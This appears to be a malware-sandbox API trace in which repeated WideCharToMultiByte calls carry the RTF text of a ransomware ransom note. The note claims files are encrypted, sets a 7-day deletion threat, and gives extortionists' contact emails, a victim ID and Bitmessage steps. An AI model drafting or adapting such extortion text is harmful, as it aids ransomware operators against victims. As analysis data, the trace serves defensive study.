0x2d4 [0289.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373e98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 